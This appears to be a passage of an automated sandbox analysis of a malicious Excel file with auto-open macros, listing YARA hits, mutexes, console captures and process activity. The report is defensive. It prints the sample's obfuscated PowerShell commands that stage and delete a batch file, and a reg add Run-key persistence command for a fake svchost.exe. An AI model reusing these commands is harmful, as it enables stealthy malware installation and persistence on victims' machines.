Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_004A2840 24_2_004A2840
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_004A2832 24_2_004A2832
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_004A25F0 24_2_004A25F0
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_004A57CC 24_2_004A57CC
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_0040C090 27_2_0040C090
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_0041A390 27_2_0041A390
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00414C70 27_2_00414C70
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00410C10 27_2_00410C10
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00411270 27_2_00411270
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_004136C0 27_2_004136C0
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00417A93 27_2_00417A93
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_003C0F79 32_2_003C0F79
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_003C2834 32_2_003C2834
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_003C2840 32_2_003C2840
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_003C25F0 32_2_003C25F0
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_003C57CC 32_2_003C57CC
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_00400F87 39_2_00400F87
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_00402840 39_2_00402840
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_00402832 39_2_00402832
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_004025F0 39_2_004025F0
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_004057CC 39_2_004057CC
Document contains embedded VBA macros
Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: String function: 0042AFA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: String function: 0040FCB0 appears 97 times
PE file contains strange resources
Source: ps.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GvthaHtVzpRh.exe.24.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.27.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses reg.exe to modify the Windows registry
Source: unknown Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Yara signature match
Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: ps.exe.23.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: GvthaHtVzpRh.exe.24.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchost.exe.27.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@60/23@4/3
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00AD1C7A AdjustTokenPrivileges, 24_2_00AD1C7A
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00AD1C43 AdjustTokenPrivileges, 24_2_00AD1C43
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_01F31806 AdjustTokenPrivileges, 32_2_01F31806
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_01F317CF AdjustTokenPrivileges, 32_2_01F317CF
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_006B1806 AdjustTokenPrivileges, 39_2_006B1806
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 39_2_006B17CF AdjustTokenPrivileges, 39_2_006B17CF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\D4FE0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\lCYThKzk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-global_lock_spinlock
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREC70.tmp Jump to behavior
Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ........<.j......d...............T.............}..v............0...............8.d............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................#.j....x.................T.............}..v............0.................d............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............................@{>.....................J^>.......................B...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............m.o.d.e........./.........................$......$.J............/.................$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .1.8.,.1. .............................*Y>.....m.o.d.e..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h.......................................................*Y>.....m.o.d.e..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............................@{>.....................J^>.......................B...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............c.o.l.o.r......./.........................$......$.J............/.................$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .F.E. .................................*Y>.....c.o.l.o..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h.......................................................*Y>.....c.o.l.o..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h.......................................................J^>.......................B...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............s.e.t.l.o.c.a.l./.........................$......$.J............/.................$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h.......................................................*Y>.....s.e.t.l..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h..................................J....................J^>.....`{.J..............B...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............f.o.r...........`{.J....................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ./.F...........`{.J....................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .%.i. .i.n. ...=.4.-.5.................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............(.'.v.e.r.'.). .d.o. .5.................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............s.e.t...........d.o. .5.................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .V.E.R.S.I.O.N.=.%.i...%.j. ............Y>.....s.e.t............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h................................DB.....................*Y>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............................p.C......................S>..............iB.......................$..............iB............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............s.e.t............\C.......................B...............C........J....x.........$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .V.E.R.S.I.O.N.=.6...1. ................^>.....s.e.t....iB.....................h.$..............iB............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............................=.6...1..................^>.....s.e.t....iB.....................h.$..............iB............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............................`{.J....................J^>......$.J..............B...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............".6...1.". .=.=. .".1.0...0.". ..........Y>.....i.f. ............DB...............$..... ....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............(................DB..................... .......................d1......h..v......$........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p........................................................Y>.....(................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............e.c.h.o.........}..v............................p.......T.......................8.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DB...............$.....0....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ..... ..........DB......................X>......................DB.............8.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............r.e.g...........}..v............................p.......f.........................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p........................................................X>.....r.e.g............DB............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............1.>......................................_>......................DB.............x.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............n.u.l. .................................._>......................DB.............x.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ..... .........d1......................ZX>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............t.i.m.e.o.u.t...}..v............................................................x.$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............1.>......................................_>..... ./.t. ..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............n.u.l. .................................._>..... ./.t. ..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ..... .........d1......................._>......................DB.............x.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............s.c.h.t.a.s.k.s.}..v............................p.................................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p.......................................................J_>.....s.c.h.t..........DB.....................v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............1.>.....................................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............n.u.l. .................................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ..... .........d1......................._>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............1.>......................................^>..... ./.t. ..........DB.............X.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... ..... .........d1......................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............r.e.g...........d1......................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p........................................................^>.....r.e.g............DB.....................T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p........................................................Y>........J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............). ......................................Y>........J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p................................DB.....................*Y>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............".6...1.". .=.=. .".6...3.". ............Y>.....i.f. ............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............(................DB.............................................d1......h..v......$........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p...............e.c.h.o.........}..v............................p.......6.......................8.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................p............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DB...............$.....2....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............r.e.g...........}..v............................h.......I.........................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h........................................................X>.....r.e.g............DB............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............1.>......................................_>......................DB.............x.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............n.u.l. .................................._>......................DB.............x.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ..... .........d1......................ZX>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................p.......................x.$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............1.>......................................_>..... ./.t. ..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............n.u.l. .................................._>..... ./.t. ..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ..... .........d1......................._>......................DB.............x.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.................................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h.......................................................J_>.....s.c.h.t..........DB.....................v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............1.>.....................................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............n.u.l. .................................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ..... .........d1......................._>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............1.>......................................^>..... ./.t. ..........DB.............X.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ..... .........d1......................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............r.e.g...........d1......................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h........................................................^>.....r.e.g............DB.....................T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h........................................................Y>........J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............). ......................................Y>........J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h................................DB.....................*Y>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............".6...1.". .=.=. .".6...2.". ............Y>.....i.f. ............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............(................DB.............................................d1......h..v......$........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h........................................................Y>.....(................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............e.c.h.o.........}..v............................h...............................8.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............r.e.g...........}..v............................h.................................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................N.......................x.$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.......t.........................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>.....................................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. .................................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................._>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v..............................................................$............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^>..... ./.t. ..........DB.............X.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^>..... ./.t. ..........DB.............X.$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........d1......................:_>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................^>.....r.e.g............DB.....................T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................Y>........J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ......................................Y>........J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................DB.....................*Y>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J....................J^>......$.J..............B...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".6...1.". ............Y>.....i.f. ............DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................DB.............................................d1......h..v......$........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.m.d...........................................(................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................X>.....C.m.d............DB.....................t....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ..............DB......................Y>......................DB...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......$.....`.$.....8.$.....B....................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................0.......................(.P.....................$.......R.................................................................2..... Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................t...........E.R.R.O.R.:. ...................8...............................................................................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................t...........E.R.R.O.(.P.....................8.......................................................j.......x...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\ps.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ps.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\ps.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
